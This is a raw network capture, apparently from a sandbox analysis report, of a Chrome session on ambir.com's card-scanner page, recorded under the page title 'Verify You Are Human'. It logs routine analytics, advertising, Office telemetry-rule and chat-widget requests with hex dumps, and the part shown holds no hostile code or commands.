                                                                                                                                                                                              2024-11-20 20:28:33 UTC967OUTPOST /ccm/collect?en=page_view&dl=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=721587341.1732134501&auid=1093817975.1732134501&npa=0&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&tft=1732134501036&tfd=11030&apve=1 HTTP/1.1
                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:33 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              Vary: X-Origin
                                                                                                                                                                                              Vary: Referer
                                                                                                                                                                                              Server: scaffolding on HTTPServer2
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Access-Control-Allow-Origin: https://ambir.com
                                                                                                                                                                                              Access-Control-Expose-Headers: date,vary,vary,vary,server,content-length
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              126192.168.2.54986813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                              x-ms-request-id: 538c974f-101e-0028-648c-3a8f64000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202833Z-185f5d8b95crwqd8hC1NYCps680000000ap00000000123h9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              127192.168.2.549872172.217.17.664431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1424OUTGET /td/rul/1070729751?random=1732134510409&cv=11&fst=1732134510409&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1 HTTP/1.1
                                                                                                                                                                                              Host: td.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
                                                                                                                                                                                              2024-11-20 20:28:34 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:34 UTC744INData Raw: 31 36 36 33 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6f 72 69 67 69 6e 2d 74 72 69 61 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 41 76 68 35 4e 79 30 58 45 46 43 79 51 37 2b 6f 4e 69 65 58 73 6b 55 72 71 59 38 65 64 55 7a 4c 35 2f 58 72 77 4b 6c 47 6a 41 52 51 48 57 34 54 46 52 4b 2b 6a 56 64 35 48 6e 44 49 70 59 32 30 6e 35 4f 4c 48 66 67 55 34 6b 75 37 78 34 38 4e 33 75 68 47 2f 41 30 41 41 41 42 78 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 52 76 64 57 4a 73 5a 57 4e 73 61 57 4e 72 4c 6d 35 6c 64 44 6f 30 4e 44 4d 69 4c 43 4a 6d 5a 57 46 30 64 58 4a 6c 49 6a 6f 69 55 48 4a 70 64 6d 46 6a 65 56 4e 68 62 6d 52 69 62 33 68 42 5a 48 4e 42 55 45 6c 7a 49 69 77 69 5a 58 68 77
                                                                                                                                                                                              Data Ascii: 1663<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhw
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1390INData Raw: 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 62 74 73 22 2c 22 74 72 75 73 74 65 64 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 4b 65 79 73 22 3a 5b 22 31 73 6d 50 78 6e 7a 77 21 32 73 5a 39 78 36 63 51 21 33 73 41 41 70 74 44 56 37 69 34 58 6d 4a 22 2c 22 31 69 34 34 38 30 35 36 35 31 22 5d 2c 22 75 73 65 72 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 22 3a 5b 5b 22 38 35 38 35 36 38 35 33 31 36 22 2c 22 34 36 35 32 39 37 34 30 31 22 2c 22 36 31 37 37 35 37 30 32 37 22 2c 22 33 33 38 35 32 38 33 22 2c 22 37 39 38 38 33 37 38 39 35 34 22 2c 22 33 33 38 35 34 30 33 22 2c 22 38 35 38 35 36 38 36 38 38 38 22 5d 2c 6e 75 6c 6c 2c 31 37 33 32 31 33 34 35 31 33 37
                                                                                                                                                                                              Data Ascii: iddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1smPxnzw!2sZ9x6cQ!3sAAptDV7i4XmJ","1i44805651"],"userBiddingSignals":[["8585685316","465297401","617757027","3385283","7988378954","3385403","8585686888"],null,17321345137
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1390INData Raw: 3a 22 68 35 6e 36 6e 31 44 71 48 59 77 22 2c 22 62 75 79 65 72 52 65 70 6f 72 74 69 6e 67 49 64 22 3a 22 31 6a 36 31 37 37 35 37 30 32 37 21 34 73 2a 32 41 22 7d 2c 7b 22 72 65 6e 64 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 73 66 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 61 64 66 65 74 63 68 2f 67 64 61 3f 61 64 67 5f 69 64 3d 31 36 36 37 30 30 32 31 39 34 36 39 5c 75 30 30 32 36 63 72 5f 69 64 3d 37 32 30 30 34 31 35 31 37 30 30 33 5c 75 30 30 32 36 63 76 5f 69 64 3d 30 5c 75 30 30 32 36 66 6f 72 6d 61 74 3d 24 7b 41 44 5f 57 49 44 54 48 7d 78 24 7b 41 44 5f 48 45 49 47 48 54 7d 5c 75 30 30 32 36 72 64 73 3d 24 7b 52 45 4e 44 45 52 5f 44 41 54 41 7d 5c 75 30 30 32 36 73 65 61 74 3d 32 5c 75 30 30 32 36 72 70 5f 69 64 3d 72
                                                                                                                                                                                              Data Ascii: :"h5n6n1DqHYw","buyerReportingId":"1j617757027!4s*2A"},{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=166700219469\u0026cr_id=720041517003\u0026cv_id=0\u0026format=${AD_WIDTH}x${AD_HEIGHT}\u0026rds=${RENDER_DATA}\u0026seat=2\u0026rp_id=r
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1390INData Raw: 4e 44 45 52 5f 44 41 54 41 7d 5c 75 30 30 32 36 73 65 61 74 3d 32 5c 75 30 30 32 36 72 70 5f 69 64 3d 72 31 6a 37 39 38 38 33 37 38 39 35 34 21 34 73 2a 32 41 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 22 31 36 36 37 30 30 32 31 39 34 36 39 22 2c 22 37 31 32 35 34 38 35 33 36 37 39 37 22 2c 6e 75 6c 6c 2c 22 32 31 36 37 39 33 31 31 30 34 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 37 39 38 38 33 37 38 39 35 34 22 5d 2c 22 61 64 52 65 6e 64 65 72 49 64 22 3a 22 51 65 35 31 67 33 6b 45 4f 5a 55 22 2c 22 62 75 79 65 72 52 65 70 6f 72 74 69 6e 67 49 64 22 3a 22 31 6a 37 39 38 38 33 37 38 39 35 34 21 34 73 2a 32 41 22 7d 2c 7b 22 72 65 6e 64 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 73 66 2e
                                                                                                                                                                                              Data Ascii: NDER_DATA}\u0026seat=2\u0026rp_id=r1j7988378954!4s*2A","metadata":["166700219469","712548536797",null,"21679311040",null,null,null,null,null,null,"7988378954"],"adRenderId":"Qe51g3kEOZU","buyerReportingId":"1j7988378954!4s*2A"},{"renderUrl":"https://tdsf.
                                                                                                                                                                                              2024-11-20 20:28:34 UTC825INData Raw: 38 35 36 38 36 38 38 38 21 34 73 2a 32 41 22 7d 5d 2c 22 65 78 65 63 75 74 69 6f 6e 4d 6f 64 65 22 3a 22 67 72 6f 75 70 2d 62 79 2d 6f 72 69 67 69 6e 22 2c 22 62 69 64 64 69 6e 67 57 61 73 6d 48 65 6c 70 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 62 75 79 65 72 2e 77 61 73 6d 22 2c 22 70 72 69 6f 72 69 74 79 22 3a 35 39 36 34 38 2c 22 65 6e 61 62 6c 65 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 50 72 69 6f 72 69 74 69 7a 61 74 69 6f 6e 22 3a 74 72 75 65 2c 22 74 72 75 73 74 65 64 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 53 6c 6f 74 53 69 7a 65 4d 6f 64 65 22 3a 22 61 6c 6c 2d 73 6c 6f 74 73 2d 72 65 71 75 65 73 74 65 64 2d 73 69 7a 65 73 22 2c 22 70 72 69 76 61 74 65 41 67 67 72 65 67
                                                                                                                                                                                              Data Ascii: 85686888!4s*2A"}],"executionMode":"group-by-origin","biddingWasmHelperUrl":"https://td.doubleclick.net/td/buyer.wasm","priority":59648,"enableBiddingSignalsPrioritization":true,"trustedBiddingSignalsSlotSizeMode":"all-slots-requested-sizes","privateAggreg
                                                                                                                                                                                              2024-11-20 20:28:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              128192.168.2.54987113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                              x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202833Z-178bfbc474bbbqrhhC1NYCvw7400000000hg00000000tdce
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:33 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              129192.168.2.54987013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                              x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202833Z-178bfbc474bmqmgjhC1NYCy16c00000000g0000000009r49
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:33 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              130192.168.2.549877192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC559OUTGET /a/assets/v0/site/7486-534-10-2045.js?cb=2024-11-20 HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:34 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 6786
                                                                                                                                                                                              cache-control: s-max-age=0
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Etag: 21b3c411436805f5884ca32db35f4fb4
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:35:27 GMT
                                                                                                                                                                                              Server: ECS (lhd/35B3)
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 14510
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:34 UTC14510INData Raw: 0a 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 43 61 6c 6c 6f 75 74 42 75 62 62 6c 65 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 46 65 65 64 62 61 63 6b 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 53 6f 75 6e 64 73 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 57 65 6c 63 6f 6d 65 41 73 73 69 73 74 27 29 3b 0a 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 73 4e 65 77 56 65 72 73 69 6f 6e 20 3d 20 6f 6c 61 72 6b 2e 5f 20 26 26 20 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 20 26 26 20 28 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 2e 66 6f 6c 6c 6f 77 20 7c 7c 20 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 2e 70 6f 70 6f 75 74 29 0a 20 20
                                                                                                                                                                                              Data Ascii: (function(){ olark.extend('CalloutBubble');olark.extend('Feedback');olark.extend('Sounds');olark.extend('WelcomeAssist'); var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              131192.168.2.549878192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC355OUTGET /jsclient/app.js HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:34 UTC413INHTTP/1.1 200 OK
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 5525
                                                                                                                                                                                              Cache-Control: max-age=10800
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:34 GMT
                                                                                                                                                                                              Etag: W/"673d0962-def3"
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 23:28:34 GMT
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 21:55:46 GMT
                                                                                                                                                                                              Server: ECS (lhd/35E1)
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 57075
                                                                                                                                                                                              Connection: close
